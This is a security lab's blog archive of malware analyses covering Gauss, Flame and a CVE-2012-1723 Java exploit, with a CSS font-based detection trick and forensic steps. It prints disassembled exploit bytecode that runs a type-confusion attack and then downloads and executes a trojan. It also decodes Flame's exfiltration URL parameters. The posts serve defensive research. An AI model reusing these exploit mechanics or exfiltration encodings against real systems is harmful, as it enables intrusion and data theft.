Posted on Leave a comment

On the Palida Narrow mystery of Gauss malware, and possible remote detection

As you all know, Kaspersky Lab has just published a detailed tech report of the latest state-sponsored targeted threat named Gauss.

So the story of Stuxnet, Duqu (found and named by us, CrySyS Lab ), Flame (yes, we had a detailed tech report on that, but we called it sKyWIper ) has not stopped here, and as many said, we currently see only the tip of the iceberg.

So the big mystery of Gauss is why Palida Narrow, a modified font with fake copyright notice is installed on victim computers. It seems that no exploit, shellcode or nasty payload are inside. Most likely… Then why? Do they depend on Palida Narrow? Most likely not.

One possibility is that there are other components using Palida for some reasons. E.g., tricking with some characters on web pages to hide alerts, or similar, not really clear operations.

A very far-fetched idea is that Gauss uses the font for printed material. It actually tricks some parts of the system to substitute fonts with Palida, so any prints will contain Palida. Later, printed documents could be identified by looking on the tiny specialities of the font.

A third, and more probable idea is that Palida installation can be in fact detected remotely by web servers, thus the Palida installation is a marker to identify infected computers that visit some specially crafted web pages. We tell you how.

If you open a web page, it can contain a CSS style sheet link, that actually tells your browser how the text blocks should look like on the web page. This style sheet can in fact include references to font faces to be used. The font face definition can refer to a local font and a URL also (with some limitations) in order to get the necessary font face if it is not installed on your system.

Let’s consider the following part of the CSS file:


@font-face {
font-family: "Palida";
src: local("Palida Narrow"),
url("palida.ttf");
}

This definition tells your browser to use Palida Narrow local font if available, if not, call back the webpage to download a copy.

This standard behavior of the browsers makes it possible to enumerate all the fonts that are installed in your system, but particularly to pinpoint if Palida Narrow is installed.

Considering this case, if the Palida is installed, your browser will simply use it for rendering the web page. If not, and only in that case, it will try to download palida.ttf. If there is no palida.ttf download on the web page, then you have Palida installed on the system.

However, there is a problem: what if palida.ttf was not downloaded as you have turned off the look up of remote fonts in your browser, or you use some special browser. Here is a solution: Let’s specify and use a surely non-existing font, like Crysysida:


@font-face {
font-family: "Crysysida";
src:
url("Crysysida.ttf");
}

  • If we have downloads for both Palida and Crysysida, then everything works great, and Palida is not installed
  • If we only see download for Crysysida, then Palida is installed on the system
  • Finally, if we see no downloads, then probably the user uses lynx or telnet to browse our webpage, or there are other circumstances that prevent the download of remote fonts.

What we detailed here is not only a possible reason of Palida having been installed on infected systems, but also a detection method for infected computers. Actually, we created a detection site of the Gauss malware by identifying Palida installations remotely. The small test site is available at http://gauss.crysys.hu

Of course the method is not bullet-proof, but an easy alternative check for those, who cannot find the fonts menu in the windows control panel.

Final note:
CrySyS Lab currently thinks, that Palida is actually a slightly modified Lucida Bright Narrow Demi Bold CE font, most likely from Bigelow and Holmes, made back in 2000, although we do not have such a sample.

Posted on Leave a comment

On the CVE-2012-1723 based java exploit and malware sample seen at our Lab

Authors: Boldi, Gábor Pék

Our latest post on 15/07 was about a trojan dropped by some Java applet that contains some Java exploit.
The dropped trojan is a fake antivirus software, here is some screenshot of it:

We found that the exploit in use was CVE-2012-1723, which is analyzed on a number of websites, like:

http://schierlm.users.sourceforge.net/CVE-2012-1723.html (detailed tech info on exploit technique)
http://www.symantec.com/connect/blogs/examination-java-vulnerability-cve-2012-1723
http://krebsonsecurity.com/2012/07/new-java-exploit-to-debut-in-blackhole-exploit-kits/ (05/07)
http://vrt-blog.snort.org/2012/07/cve-2012-1723-new-java-attack-added-to.html (09/07)
http://blog.eset.com/2012/07/10/java-the-hutt-meets-cve-2012-1723-the-evil-empire-strikes-back (10/07)

Our sample of the exploit slightly differs from the analyses above, thus we decided to disclose some more info on that.
Our sample is an applet and java classes stored in a jar file (creation date of classes are 14/07/2012 14:37), namely 4 classes: lei, pas, pax and tee). The applet is stored in class lei.

Lei gets one parameter called “nob” which contains the URL to be downloaded and executed upon successful explotation, as shown in the code example below by javap decompile.


public class lei extends java.applet.Applet {
public static java.lang.String[] twa;

public static java.lang.String kin;

public lei();
Code:
0: aload_0
1: invokespecial #1 // Method java/applet/Applet."":()V
4: return

public void init();
Code:
0: aload_0
1: pop
2: aload_0
3: ldc #2 // String nob
5: invokevirtual #3 // Method getParameter:(Ljava/lang/String;)Ljava/lang/String;
8: ldc #4 // String @
10: invokevirtual #5 // Method java/lang/String.split:(Ljava/lang/String;)[Ljava/lang/String;
13: putstatic #6 // Field twa:[Ljava/lang/String;
16: iconst_0
17: istore_1

As it can be seen the string is stored in twa, which will be used later on the downloader class tee:


public java.lang.Object run();
Code:
0: getstatic #4 // Field lei.twa:[Ljava/lang/String;
3: astore 12

The exploitation mechanism is very similar to the samples given by the publications described above. lei == fawd of the Symantec analysis, the main applet. It uses class pas similar to fawc (Symantec) == C2 (eset) for main exploitation, which in our sample 97 pieces of variables of type “sax” named fog01..fog97. The number of variables therefore slighly differs, Symantec and ESET both reported 99 viariables, Michael ‘mihi’ Schierl talks about 100 variables.

Related part of pas:


public class pas {
static java.lang.ClassLoader fob;

sax fog1;
sax fog2;
...
sax fog95;
sax fog96;
sax fog97;

pas();
Code:
0: aload_0
1: invokespecial #1 // Method java/lang/Object."":()V
4: return

Or if you like it in java way, here is an image with a decompiled version:

Back to lei, it has a cycle of 100,000, like in the Mihi document.

Mihi writes:

Then use this class follows to confuse an object from type A to B:
Instantiate a new instance of your crafted class.
call its confuse method 100_000 times with arg null.
wait a few milliseconds to give JIT time to do its dirty work.
call the confuse method with your instance of A.

Our code:


26: iload_1
27: ldc #9 // int 100000
29: if_icmpge 44
32: aload_2
33: aconst_null
34: invokevirtual #10 // Method pas.gat:(Ljava/lang/ClassLoader;)Lsax;
37: pop
38: iinc 1, 1
41: goto 26
44: invokestatic #11 // Method java/lang/Thread.currentThread:()Ljava/lang/Thread;

So it uses pas.gat for 100 000 times, then wait and confuse at line 44:


44: invokestatic #11 // Method java/lang/Thread.currentThread:()Ljava/lang/Thread;
47: pop
48: ldc2_w #12 // long 11l
51: invokestatic #14 // Method java/lang/Thread.sleep:(J)V
54: aload_2
55: aload_0
56: invokevirtual #15 // Method java/lang/Object.getClass:()Ljava/lang/Class;
59: invokevirtual #16 // Method java/lang/Class.getClassLoader:()Ljava/lang/ClassLoader;
62: invokevirtual #10 // Method pas.gat:(Ljava/lang/ClassLoader;)Lsax;
65: astore_3
66: aload_3
67: invokestatic #17 // Method sax.urd:(Lsax;)V

As you can see, after exploitation sax.urd is called.

pas.gat
works like Mihi wrote about the confusion function:

Also add a non-static confuse method that
takes a parameter of type A and returns a result of type B
returns quickly if called with a null argument
else first calls GETSTATIC and then PUTFIELD on the static field (don’t forget to push this as the receiver to the stack for the second call!)
next checks each of the instance fields and returns the first one that is not null (ASM is great for creating loops of repetitive bytecode like that)
returns null otherwise, just to make the method return a value in all cases.

In code:


sax gat(java.lang.ClassLoader);
Code:
0: aload_1
1: ifnonnull 6
4: aconst_null
5: areturn
6: getstatic #2 // Field java/lang/System.out:Ljava/io/PrintStream;
9: getstatic #3 // Field fob:Ljava/lang/ClassLoader;
12: invokevirtual #4 // Method java/io/PrintStream.print:(Ljava/lang/Object;)V
15: aload_0
16: nop
17: aload_1
18: putfield #3 // Field fob:Ljava/lang/ClassLoader;
21: aload_0
22: getfield #5 // Field fog1:Lsax;
25: ifnull 33
28: aload_0
29: getfield #5 // Field fog1:Lsax;
32: areturn
33: aload_0
34: getfield #6 // Field fog2:Lsax;
...
1181: getfield #101 // Field fog97:Lsax;
1184: areturn
1185: aconst_null
1186: areturn
}

You can see the rapid return for null parameter then the getstatic-putfield parts nad the final return, exactly like it was described.

The sax type for fog variables is defned in sax.class. It contains zoa, owl and urd methods. As we have seen, method urd is called from lei after explitation.

urd uses the class tee to download the trojan. Defined in the run method of tee the trojan is downloaded to the temporary directory and later started with “cmd.exe /c start” by method pis. The method hes of tee defines the download InputStream for the URL (or URLs separated by @) to be downloaded with the help of goy method of lei. urd of sax not just uses tee to make the download and run, but his own owl method sets the proper permissions to fullfil its goal.

Conclusion

Our malware sample it very similar to the Maljava/Symantec and also the description from Mihi, although slight differences, and different naming obfuscation exists. The file to be downloaded is not hard-coded, but received as parameter.

Corresponding files and hashes:

eb710f5b0022d35a2cbf0c539528cbb3 *jar_cache9086383559255725283.tmp
f13441dbe92c099f1589e79a8b25f2ef *lei.class
ebe346ef2e2c27c73cd5d76f68e682e6 *pas.class
b9c9522a5ba97f1aec7e0189c6b2ef71 *sax.class
d6d35282a88af5be723137f564e9cb92 *tee.class

We also share VirusTotal results on our file. Notes on Virustotal results:
McAfee naming Exploit-CVE2012-1273.c shoud be 1723 instead of 1273.
Symantec names it Trojan.Maljava, although their file names and content for that sample described in http://www.symantec.com/connect/blogs/examination-java-vulnerability-cve-2012-1723 slightly differ.
EXP/2012-0507.CK.2 refers to CVE-2012-0507, another java exploit http://krebsonsecurity.com/2012/03/new-java-attack-rolled-into-exploit-packs/

Virustotal results:

    <table style="margin-bottom:8px;margin-left:8px;">
        <tbody>
            <tr>
              <td>SHA256:</td>
              <td>2881310732f4464fcaf2aeb6b13533ae1be29b25637b895a1f652db6fc8c6d5a</td>
            </tr>
            <tr class="collapsable hide">
              <td>SHA1:</td>
              <td>5fceed49f0e9a2f7c0bc0b936660c8dbaf822125</td>
            </tr>
            <tr class="collapsable hide">
              <td>MD5:</td>
              <td>eb710f5b0022d35a2cbf0c539528cbb3</td>
            </tr>
            <tr class="collapsable hide">
              <td>File size:</td>
              <td>6.1 KB ( 6243 bytes ) </td>
            </tr>
            <tr>
              <td>File name:</td>
              <td>jar_cache9086383559255725283.tmp</td>
            </tr>
            <tr class="collapsable hide">
              <td>File type:</td>
              <td>JAR</td>
            </tr>
            <tr class="collapsable hide">
                <td>Tags:</td>
                <td>
                        <span class="label notice">jar</span>
                </td>
            </tr>
            <tr>
              <td>Detection ratio:</td>
              <td class=" text-red ">15 / 41</td>
            </tr>
            <tr>
              <td>Analysis date:</td>
              <td>
                  2012-07-28 22:19:41 UTC
                  ( 12 perc ago )
              </td>
            </tr>
        </tbody>
    </table>
<table class="table table-bordered table-striped" id="antivirus-results">
    <thead>
        <tr>
            <th class="header headerSortDown">Antivirus</th>
            <th id="results-header" style="cursor:pointer;">Result</th>
            <th>Update</th>
        </tr>
    </thead>
    <tbody>
        <tr>
            <td>nProtect</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>CAT-QuickHeal</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>McAfee</td>
            <td class="text-red">Exploit-CVE2012-1273.c</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>TheHacker</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>K7AntiVirus</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>VirusBuster</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>F-Prot</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>Symantec</td>
            <td class="text-red">Trojan.Maljava</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>Norman</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>TotalDefense</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>TrendMicro-HouseCall</td>
            <td class="text-red">TROJ_GEN.F47V0720</td>
            <td>20120729</td>
        </tr>
        <tr>
            <td>Avast</td>
            <td class="text-red">Java:Agent-BIJ [Trj]</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>eSafe</td>
            <td class="text-red">Win32.Trojan</td>
            <td>20120726</td>
        </tr>
        <tr>
            <td>ClamAV</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>Kaspersky</td>
            <td class="text-red">UDS:DangerousObject.Multi.Generic</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>BitDefender</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>ViRobot</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>ByteHero</td>
            <td >-</td>
            <td>20120723</td>
        </tr>
        <tr>
            <td>Sophos</td>
            <td class="text-red">Troj/JavaBz-FT</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>Comodo</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>F-Secure</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>DrWeb</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>VIPRE</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>AntiVir</td>
            <td class="text-red">EXP/2012-0507.CK.2</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>TrendMicro</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>McAfee-GW-Edition</td>
            <td class="text-red">Exploit-CVE2012-1273.c</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>Emsisoft</td>
            <td class="text-red">Trojan-Downloader.Java.OpenConnection!IK</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>Jiangmin</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>Antiy-AVL</td>
            <td >-</td>
            <td>20120727</td>
        </tr>
        <tr>
            <td>Microsoft</td>
            <td class="text-red">TrojanDownloader:Java/OpenConnection.PU</td>
            <td>20120729</td>
        </tr>
        <tr>
            <td>SUPERAntiSpyware</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>GData</td>
            <td class="text-red">Java:Agent-BIJ </td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>Commtouch</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>AhnLab-V3</td>
            <td class="text-red">JAVA/Agent</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>VBA32</td>
            <td >-</td>
            <td>20120727</td>
        </tr>
        <tr>
            <td>ESET-NOD32</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>Rising</td>
            <td >-</td>
            <td>20120726</td>
        </tr>
        <tr>
            <td>Ikarus</td>
            <td class="text-red">Trojan-Downloader.Java.OpenConnection</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>Fortinet</td>
            <td class="text-red">Java/JavaBz.FT!tr</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>AVG</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
        <tr>
            <td>Panda</td>
            <td >-</td>
            <td>20120728</td>
        </tr>
    </tbody>
</table>
Posted on Leave a comment

New java dropped malware

We are investigating the report from one of our colleagues, reporting one website dropped malicious exe files by some java exploit, possibly an already known one. Of course, this is not “that” important, but keep in touch on this:
Hashes
4307f1bf8d41604875d8b21c878659c0 *01388ca50e45.exe
100ad7ab0fff23a0938d5b19ede20362 *01388ca69ef2.exe
eb710f5b0022d35a2cbf0c539528cbb3 *jar_cache875449263521178018.tmp
eb710f5b0022d35a2cbf0c539528cbb3 *jar_cache9086383559255725283.tmp

Inside the jar
f13441dbe92c099f1589e79a8b25f2ef *lei.class
ebe346ef2e2c27c73cd5d76f68e682e6 *pas.class
b9c9522a5ba97f1aec7e0189c6b2ef71 *sax.class
d6d35282a88af5be723137f564e9cb92 *tee.class

Thanks for the info, K.T. (Cuby).
b.

Posted on Leave a comment

Analysis of Flame WuSetupV.exe URL parameters

Basically the main functionality of the WuSetupV.exe of Flame is to create a special URL, download the main component of Flame using the special URL, store it and install it on the victim computer.

WuSetupV.exe structure

The most interesting topic is what type of data is stored inside the URL created by WuSetupV as it uses multiple parameters, like
GET /view.php?mp=1&jz=4073875454&fd=28369876&am=55597C801D14&ef=40474645&pr=0&ec=0&ov=666641736666417766664174pl=gspnZGygMcK0Gnng|spnZGy|nynn|0ncnn|TWvDKoKv|nGcRW0Gn|Dnann|Rya0ZjD8|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|n8KKDnR|GU8DKcGc|-2TacGCcap|RyZKKDne|RyZKKDne|aDo|Tn0vZLp|Txax0DZ|qxsGZx8-4GUg|cGoGeWZ|qxsGZx8-| HTTP/1.1

So let’s see how the parts of the URL are created.

The “jz=” parameter is created randomly, but reused if error occurs and second download is done. This means the value might be used multiple times within the same session, hence it is a session id.
The value is converted to decimal. The random generator is a well known simple one, the main part is

.text:00403489 mov eax, dword_4053C0
.text:0040348E imul eax, 343FDh
.text:00403494 add eax, 269EC3h ;
.text:00403499 mov dword_4053C0, eax
.text:0040349E sar eax, 10h
.text:004034A1 and eax, 7FFFh

The “am=” parameter, handled around sub_401426, contains a hex string, which is bytewise xor’d with 0x55. The hex string is 48 bits long and contains the interface MAC address. In this case am=55597C801D14 refers to the 00:0c:29:d5:48:41 VMware MAC address.

The “ef=” parameter is the IP address or IP addresses (concatenated) of the client computer, most likely it is useful if proxy server or NAT is used. The parameter is character-wise XORd with 0x44 at each byte, with the subroutine described below for parameter “ov=” (loc_402A30), and represented in hex string. In this way 0x40474645 represents IP address 1.2.3.4.

The “ov=” parameter contains Windows version information. The string “ov=666641736666417766664174” can be separated into three 8-character hex string

66664173
66664177
66664174

All three parts are XOR’d with 0x66 at the end by the following simple code fragment:

.text:00402A30 loc_402A30: ; CODE XREF: xor_encr_sub_402A2E+12j
.text:00402A30 mov eax, [esp+arg_0]
.text:00402A34 mov dl, [esp+arg_4]
.text:00402A38 add eax, ecx
.text:00402A3A xor [eax], dl
.text:00402A3C inc ecx
.text:00402A3D cmp ecx, 4
.text:00402A40 jb short loc_402A30
.text:00402A42 retn

The original values are:

2715
2711
2712

The originals of all of these three values are 0x2710 added as follows:

.text:0040159D mov eax, [ebp+VersionInformation.dwMajorVersion]
.text:004015A3 push 66h ; int
.text:004015A5 add eax, 2710h
.text:004015AA push edi ; lpString1
.text:004015AB push eax ; int
.text:004015AC call xor_and_printf08x_sub_402A63
.text:004015B1 add esp, 0Ch
.text:004015B4 test eax, eax
.text:004015B6 jz short loc_4015FE
.text:004015B8 mov eax, [ebp+VersionInformation.dwMinorVersion]
.text:004015BE add dword ptr [esi], 8
.text:004015C1 push 66h ; int
.text:004015C3 add eax, 2710h
.text:004015C8 push edi ; lpString1
.text:004015C9 push eax ; int
.text:004015CA call xor_and_printf08x_sub_402A63
.text:004015CF add esp, 0Ch
.text:004015D2 test eax, eax
.text:004015D4 jz short loc_4015FE
.text:004015D6 mov eax, [ebp+VersionInformation.dwPlatformId]
.text:004015DC add dword ptr [esi], 8
.text:004015DF push 66h ; int
.text:004015E1 add eax, 2710h
.text:004015E6 push edi ; lpString1
.text:004015E7 push eax ; int
.text:004015E8 call xor_and_printf08x_sub_402A63

Therefore, the string above represents

dwMajorVersion = 5
dwMinorVersion = 1
dwPlatformId = 2

From which 5.1 represents Windows XP, and VER_PLATFORM_WIN32_NT==2 as dwPlatformId.

The “fd=” parameter stores HKEY_CURRENT_USER\Console\StandardSize or in HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry dword in decimal form, depending on the Windows version. In our case it is 28369876, which is 0x01B0E3D4 in hex. This variable in the registry is not standard. If it does not exist, the StandardSize parameter is created by WuSetupV.exe as a random number seeded with time information, and stored in the registry; the related code is the following:

.text:00403C01 call time_rnd_seed_sub_4025BF
.text:00403C06 call rndgen3_4times_sub_402637
.text:00403C0B mov [esi], eax
.text:00403C0D mov dword ptr [edi], 1
.text:00403C13 mov edx, [esi]
.text:00403C15 push edx ; Data
.text:00403C16 call set_standardsize_key_sub_403DB0

The difference between “jc=” and “fd=” is that “jc=” is a session identifier, re-used only within a single run of WuSetupV.exe, while “fd=” is a permanent id for the particular computer stored in the registry.

Interestingly, libclanattack Lua script also uses StandardSize, but the corresponding key is in TimeZoneInformation:

1 [-]: GETUPVAL R0 U0 ; R0 := U0
2 [-]: GETTABLE R0 R0 K0 ; R0 := R0["remoteSafety"]
3 [-]: SELF R0 R0 K1 ; R1 := R0; R0 := R0["getRegDword"]
4 [-]: LOADK R2 K2 ; R2 := "HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation"
5 [-]: LOADK R3 K3 ; R3 := "StandardSize"
6 [-]: TAILCALL R0 4 0 ; R0,... := R0(R1,R2,R3)
7 [-]: RETURN R0 0 ; return R0,...
8 [-]: RETURN R0 1 ; return

The “pr=” parameter is set according to the existence of the StandardSize parameter. If it was found by the program, then “pr=0”, if it is the first start of the malicious WuSetupV, then “pr=1” shows to the server that this is a new installation.

WuSetupV.exe looks for the registry key
SYSTEM\CurrentControlSet\Control\TimeZoneInformation
But it is not interested in the time zone. In reality it looks for the StandardDateBias data inside the registry, then later it adds to “dd=” CGI parameter in decimal form. The real reason is unknown.

The longest part of the URL, the “pl=” CGI parameter is encrypted by a simple substitution table:


hXk1Qrbf6VH~29SMYAsCF-q7Omad0eGLojWi.DyvK8zcnZxRTUpwE_B5tuNPIJgl43
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-.

This way for the query

GET /view.php?mp=1&jz=4073875454&fd=28369876&am=55597C801D14&ef=40474645&pr=0&ec=0&ov=666641736666417766664174pl=gspnZGygMcK0Gnng|spnZGy|nynn|0ncnn|TWvDKoKv|nGcRW0Gn|Dnann|Rya0ZjD8|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|n8KKDnR|GU8DKcGc|-2TacGCcap|RyZKKDne|RyZKKDne|aDo|Tn0vZLp|Txax0DZ|qxsGZx8-4GUg|cGoGeWZ|qxsGZx8-| HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mshome-f3be293c
Connection: Keep-Alive

the original value of “pl=”, which contains the list of current active processes, is in this case:

_System_Process_ System smss csrss winlogon services lsass vmacthlp svchost
svchost svchost svchost svchost spoolsv explorer VMwareTray vmtoolsd vmtoolsd alg
wscntfy wuauclt WuSetupV.ex_ regedit WuSetupV

Upon unsuccessful download, WuSetupV creates a second URL and sends it to the server like the one below:


GET /view.php?ac=1&jz=2203776806&fd=28369876&gb=0&rt=a0b0c0d HTTP/1.1

Summary of the URL parameters used by WuSetupV.exe


mp: is fixed 1 for first query
jz: session identifier
fd: computer identifier
am: MAC address of interface
ef: IP address
pr: is 0 if StandardSize already exists, pr=1 for new installations
ec: generally 0, probably some error checking related to ~DHF593.tmp file
ov: Windows version number
pl: Process list
ac: is fixed 1; used in second query
gb: 0, ??
rt: is a0b0c0d, ??
dd: value of StandardDateBias, if set

TODOs:
What exactly are gb, ec, rt good for?
How is the program related to ef_trace file?

Posted on Leave a comment

Flame USB dot file confirmed

Finally we were able to do some tests, and we can confirm Bitdefender’s http://labs.bitdefender.com/2012/06/flame-the-story-of-leaked-data-carried-by-human-vector/ finding on USB file transfer of Flame. Again, please first read our original tech report first.

If started by rundll, Flame creates “.” file within minutes.

As the file name is very special, under windows the easiest way to check is dir /a.
Under Linux you can use the good old sleuth kit:

# fls -a ./usb1
r/d 2: .
v/v 3368675: MBR
v/v 3368676:
FAT1
v/v 3368677: FAT2
d/d 3368678:
OrphanFiles

But given
# istat ./usb1 2
Directory Entry: 2
Allocated
File Attributes: Directory
Size: 1024
Name:

Directory Entry Times:
Written: Thu Jan 1 01:00:00 1970
Accessed: Thu Jan 1 01:00:00 1970
Created: Thu Jan 1 01:00:00 1970

Sectors:
1680 1681

So if not file 2, then maybe 3, 4?

It’s surely not what we are looking for.

istat ./usb1 4
Directory Entry: 4
Allocated
File Attributes: File, Hidden, System, Archive
Size: 172032
Name: HUB001.DAT

Directory Entry Times:
Written: Tue Jun 12 22:13:50 2012
Accessed: Tue Jun 12 00:00:00 2012
Created: Thu Jan 1 01:00:00 1970

Sectors:
1682 1683 1684 1685 1686 1687 1688 1689
1690 1691 1692 1693 1694 1695 1696 1697
1698 1699 1700 1701 1702 1703 1704 1705
1706 1707 1708 1709 1710 1711 1712 1713
1714 1715 1716 1717 1718 1719 1720 1721
1722 1723 1724 1725 1726 1727 1728 1729
1730 1731 1732 1733 1734 1735 1736 1737
1738 1739 1740 1741 1742 1743 1744 1745
1746 1747 1748 1749 1750 1751 1752 1753
1754 1755 1756 1757 1758 1759 1760 1761
1762 1763 1764 1765 1766 1767 1768 1769
1770 1771 1772 1773 1774 1775 1776 1777
1778 1779 1780 1781 1782 1783 1784 1785
1786 1787 1788 1789 1790 1791 1792 1793
1794 1795 1796 1797 1798 1799 1800 1801
1802 1803 1804 1805 1806 1807 1808 1809
1810 1811 1812 1813 1814 1815 1816 1817
1818 1819 1820 1821 1822 1823 1824 1825
1826 1827 1828 1829 1830 1831 1832 1833
1834 1835 1836 1837 1838 1839 1840 1841
1842 1843 1844 1845 1846 1847 1848 1849
1850 1851 1852 1853 1854 1855 1856 1857
1858 1859 1860 1861 1862 1863 1864 1865
1866 1867 1868 1869 1870 1871 1872 1873
1874 1875 1876 1877 1878 1879 1880 1881
1882 1883 1884 1885 1886 1887 1888 1889
1890 1891 1892 1893 1894 1895 1896 1897
1898 1899 1900 1901 1902 1903 1904 1905
1906 1907 1908 1909 1910 1911 1912 1913
1914 1915 1916 1917 1918 1919 1920 1921
1922 1923 1924 1925 1926 1927 1928 1929
1930 1931 1932 1933 1934 1935 1936 1937
1938 1939 1940 1941 1942 1943 1944 1945
1946 1947 1948 1949 1950 1951 1952 1953
1954 1955 1956 1957 1958 1959 1960 1961
1962 1963 1964 1965 1966 1967 1968 1969
1970 1971 1972 1973 1974 1975 1976 1977
1978 1979 1980 1981 1982 1983 1984 1985
1986 1987 1988 1989 1990 1991 1992 1993
1994 1995 1996 1997 1998 1999 2000 2001
2002 2003 2004 2005 2006 2007 2008 2009
2010 2011 2012 2013 2014 2015 2016 2017

Remember the size from the dir command?

HUB001.DAT? :

00d2020: 4855 4230 3031 2020 4441 5426 0000 0000 HUB001 DAT&....
00d2030: 0000 cc40 0000 b9b1 cc40 0300 00a0 0200 ...@.....@......

Yes. But even ifind could cheat us:

ifind -a -n "HUB001.DAT" ./usb1
2

But fsstat shows the 336 sectors (of standard 512 bytes) we are looking for:

FAT CONTENTS (in sectors)

1680-1681 (2) -> EOF
1682-2017 (336) -> EOF

So Let’s do:

icat-sleuthkit ./usb1 4 >hub001.dat

Great
-rw-r--r-- 1 root root 172032 Jun 12 22:53 hub001.dat

xxd hub001.dat |less
0000000: 217a 30e6 280c b557 da53 ce11 28b5 60ea !z0.(..W.S..(.`.
0000010: 07ea 8282 ea2e b5b5 eaea eabb eaea eaea ................

Ok, It’s encrypted. Get the skywiper techrep for reference! It’s like Figure 24 on Encryption E1.

After decryption:

0000000000: 53 51 4C 69 74 65 20 66 │ 6F 72 6D 61 74 20 33 00 SQLite format 3
0000000010: 10 00 01 01 00 40 20 20 │ 00 00 00 38 00 00 00 00 ► ☺☺ @ 8
0000000020: 00 00 00 00 00 00 00 00 │ 00 00 00 0D 00 00 00 03 ♪ ♥
0000000030: 00 00 00 00 00 00 00 0E │ 00 00 00 01 00 00 00 00 ♫ ☺
0000000040: 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00

Seems ok, confirmed. Thanks again for Bitdefender for the great job.

Posted on Leave a comment

Stuxnet-Duqu-Flame open source license questions v0

Dear All,
As You know, the recent nation-sponsored attacks used a bunch of libraries. However, nobody investigated yet the license terms. Here is a short list, based on the feedbacks we might update this article

Duqu:

modified LZO for .zdata: LZO and the LZO algorithms and implementations are distributed under the terms of the GNU General Public License (GPL) .

Flame:

putty -MIT license
libbz2 – BSD-style license
zlib – very permissive license http://www.gzip.org/zlib/zlib_license.html
SQLite – public domain
Lua – MIT license

As we are after a long-long day of serious problems, let’s go for some nice and easy point.

So our questions is: Please, Dear Authors of Duqu (whoever they are), hand over the source code of Duqu (or Beacon/NYT), as it contains GPL code.

The source code can be sent to duqusubmit@crysys.hu.
Discussion on the topic is highly welcome.

Thank you for your attention.
b.

Disclaimer: This post is for fun, don’t take it too seriously, but the questions are still valid. This post is a personal post of one of the Lab members and does not reflect the view of any organization.

Posted on Leave a comment

The Flame malware WuSetupV.exe certificate chain

First of all, be sure to read Our tech report on the Flame/Flamer/TheFlame/sKyWIper Malware.

As You already know, some Microsoft certificates were abused for flame malware MiTM installation method.
But take a look on the technical details of the certificate chain.

The actual code is signed by a series of certificates:

One interesting thing is that the program file was timestamped, too:

Ok, let’s see the certificates from top to down:


Certificate:
Data:
Version: 3 (0x2)
Serial Number:
c1:00:8b:3c:3c:88:11:d1:3e:f6:63:ec:df:40
Signature Algorithm: md5WithRSAEncryption
Issuer: OU=Copyright (c) 1997 Microsoft Corp., OU=Microsoft Corporation, CN=Microsoft Root Authority
Validity
Not Before: Jan 10 07:00:00 1997 GMT
Not After : Dec 31 07:00:00 2020 GMT
Subject: OU=Copyright (c) 1997 Microsoft Corp., OU=Microsoft Corporation, CN=Microsoft Root Authority
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:a9:02:bd:c1:70:e6:3b:f2:4e:1b:28:9f:97:78:
5e:30:ea:a2:a9:8d:25:5f:f8:fe:95:4c:a3:b7:fe:
9d:a2:20:3e:7c:51:a2:9b:a2:8f:60:32:6b:d1:42:
64:79:ee:ac:76:c9:54:da:f2:eb:9c:86:1c:8f:9f:
84:66:b3:c5:6b:7a:62:23:d6:1d:3c:de:0f:01:92:
e8:96:c4:bf:2d:66:9a:9a:68:26:99:d0:3a:2c:bf:
0c:b5:58:26:c1:46:e7:0a:3e:38:96:2c:a9:28:39:
a8:ec:49:83:42:e3:84:0f:bb:9a:6c:55:61:ac:82:
7c:a1:60:2d:77:4c:e9:99:b4:64:3b:9a:50:1c:31:
08:24:14:9f:a9:e7:91:2b:18:e6:3d:98:63:14:60:
58:05:65:9f:1d:37:52:87:f7:a7:ef:94:02:c6:1b:
d3:bf:55:45:b3:89:80:bf:3a:ec:54:94:4e:ae:fd:
a7:7a:6d:74:4e:af:18:cc:96:09:28:21:00:57:90:
